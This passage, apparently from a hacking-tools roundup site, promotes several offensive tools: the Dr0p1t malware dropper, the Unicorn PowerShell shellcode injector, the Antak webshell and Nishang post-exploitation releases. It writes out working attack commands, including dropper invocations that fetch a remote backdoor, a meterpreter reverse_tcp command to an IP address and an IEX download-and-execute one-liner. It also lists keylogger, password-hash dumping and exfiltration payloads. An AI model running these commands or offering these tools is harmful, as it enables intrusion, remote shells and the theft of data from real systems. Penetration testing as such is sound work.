  -p           Run this powershell script before running your malware. Check scripts folder
  -v           Run this vbs script before running your malware. Check scripts folder
  --only32     Download your malware for 32 bit devices only
  --only64     Download your malware for 64 bit devices only
  --upx        Use UPX to compress the final file.
  -i           Use icon to the final file. Check icons folder.
  -q           Stay quite ( no banner )
  -u           Check for updates
  -nd          Display less output information

Examples

./Dr0p1t.py https://test.com/backdoor.exe -s -t -k --upx
./Dr0p1t.py https://test.com/backdoor.exe -k -b block_online_scan.bat --only32
./Dr0p1t.py https://test.com/backdoor.exe -s -t -k -p Enable_PSRemoting.ps1

Prerequisites

• Python 3.x( prefered 3.5 )
• Python libraries requirements in requirements.txt

Installation
First download it by

git clone https://github.com/D4Vinci/Dr0p1t-Framework

if you are on linux and do

cd Dr0p1t-Framework
pip install -r requirements.txt
./Dr0p1t.py

And if you are on windows download it and then do

cd Dr0p1t-Framework
pip install -r requirements.txt
pip install -r windows_requirements.txt
./Dr0p1t.py

Libraries in windows_requirements.txt are used to enable unicodes in windows which will make coloring possible 

Todo

• Python 2 support
• Work on UAC bypass
• Work on spreading on device and may be in lan too
• Injecting dr0pp3r to another program
• More modules

Download Dr0p1t-Framework

Read More

Unicorn - Tool for using a PowerShell downgrade attack and inject shellcode straight into memory

Magic Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory. Based on Matthew Graeber's powershell attacks and the powershell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18.

Usage is simple, just run Magic Unicorn (ensure Metasploit is installed and in the right path) and magic unicorn will automatically generate a powershell command that you need to simply cut and paste the powershell code into a command line window or through a payload delivery system.

root@bt:~/Desktop# python unicorn.py
                                                     ,/
                                                    //
                                                  ,//
                                      ___   /|   |//
                                  `__/\_ --(/|___/-/
                               \|\_-\___ __-_`- /-/ \.
                              |\_-___,-\_____--/_)' ) \
                               \ -_ /     __ \( `( __`\|
                               `\__|      |\)\ ) /(/|
       ,._____.,            ',--//-|      \  |  '   /
      /     __. \,          / /,---|       \       /
     / /    _. \  \        `/`_/ _,'        |     |
    |  | ( (  \   |      ,/\'__/'/          |     |
    |  \  \`--, `_/_------______/           \(   )/
    | | \  \_. \,                            \___/\
    | |  \_   \  \                                 \
    \ \    \_ \   \   /                             \
     \ \  \._  \__ \_|       |                       \
      \ \___  \      \       |                        \
       \__ \__ \  \_ |       \                         |
       |  \_____ \  ____      |                        |
       | \  \__ ---' .__\     |        |               |
       \  \__ ---   /   )     |        \              /
        \   \____/ / ()(      \          `---_       /|
         \__________/(,--__    \_________.    |    ./ |
           |     \ \  `---_\--,           \   \_,./   |
           |      \  \_ ` \    /`---_______-\   \\    /
            \      \.___,`|   /              \   \\   \
             \     |  \_ \|   \              (   |:    |
              \    \      \    |             /  / |    ;
               \    \      \    \          ( `_'   \  |
                \.   \      \.   \          `__/   |  | 
                  \   \       \.  \                |  |
                   \   \        \  \               (  )
                    \   |        \  |              |  |
                     |  \         \ \              I  `
                     ( __;        ( _;            ('-_';
                     |___\        \___:            \___:

Unicorn is a PowerShell injection tool utilizing Matthew Graebers attack and expanded to automatically downgrade the process if a 64 bit platform is detected. This is useful in order to ensure that we can deliver a payload with just one set of shellcode instructions. This will work on any version of Windows with PowerShell installed. Simply copy and paste the output and wait for the shells.

Usage:

python unicorn.py payload reverse_ipaddr port Example: python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.5 443

Download Unicorn

Read More

Antak WebShell - A webshell which utilizes PowerShell

Antak is a webshell written in C#.Net which utilizes powershell. Antak is a part of Nishang and updates could be found here: https://github.com/samratashok/nishang

Use this shell as a normal powershell console. Each command is executed in a new process, keep this in mind while using commands (like changing current directory or running session aware scripts).

Executing PowerShell scripts on the target -

1. Paste the script in command textbox and click 'Encode and Execute'. A reasonably large script could be executed using this.
2. Use powershell one-liner (example below) for download & execute in the command box. IEX ((New-Object Net.WebClient).DownloadString('URL to script here')); [Arguments here]
3. By uploading the script to the target and executing it.
4. Make the script a semi-colon separated one-liner.

Files can be uploaded and downloaded using the respective buttons.

Uploading a file - To upload a file you must mention the actual path on server (with write permissions) in command textbox. (OS temporary directory like C:\Windows\Temp may be writable.) Then use Browse and Upload buttons to upload file to that path.

Downloading a file - To download a file enter the actual path on the server in command textbox. Then click on Download button.

Main Features:

• Upload a file
• Download a file
• Executing Scripts
• Remoting/Pivoting

Download Antak WebShell

Read More

[Nishang v0.3.0] The PowerShell for Penetration Testing released (introducing Powerpreter)

Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security and post exploitation during Penetraion Tests. The scripts are written on the basis of requirement by the author during real Penetration Tests.

Powerpreter is a powershell module. I decided to make it a part of Nishang as there is a large amount of repeated code. This post assumes that we have Administrative access to a Windows 7 machine. 

Powerpreter can surely be used as a non-admin user but obviously with limited (but still useful functionalities. Like other scripts in Nishang, I have tried my best to keep powerpreter compatible to powershellv2 so you may see some code which could be done by a cmdlet in powershellv3 and v4.

Changelog

• Added Powerpreter
• Added Execute-DNSTXT-Code
• Bug fix in Create-MultipleSessions.
• Changes to StringToBase64. It now supports Unicode encoding which makes it usable with -Encodedcommand.
• More Changes to StringToBase64. Now a file can be converted.
• Added Copy-VSS
• Information_Gather shows output in better format now.
• Information_Gather renamed to Get-Information.
• Wait for command renamed to HTTP-Backdoor.
• Time_Execution renamed Execute-OnTime
• Invoke-PingSweep renamed to Port-Scan
• Invoke-Medusa renamed to Brute-Force

More information about v0.3.0

Read More

[Nishang v.0.2.7] PowerShell for Penetration Testing

Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security and post exploitation during Penetraion Tests. The scripts are written on the basis of requirement by the author during real Penetration Tests.It contains many interesting scripts like download and execute, keylogger, dns txt pwnage, wait for command and much more.

Changelog:

- DNS_TXT_Pwnage, Time_Execution and Wait_For_Command can now be stopped remotely. Also, these does not stop autmoatically after running a script/command now. 

- DNS_TXT_Pwnage, Time_Execution and Wait_For_Command can now return results using selected exfiltration method. 

- Fixed a minor bug in DNS_TXT_Pwnage. 

- All payloads which could post data to the internet now have three options pastebin/gmail/tinypaste for exfiltration. 

- Added Get-PassHashes payload. 

- Added Download-Execute-PS payload. 

- The keylogger logs only fresh keys after exfiltring the keys 30 times. 

- A delay after success has been introduced in various payloads which connect to the internet to avoid generating too much traffic.    

Download Nishang v.0.2.7

Read More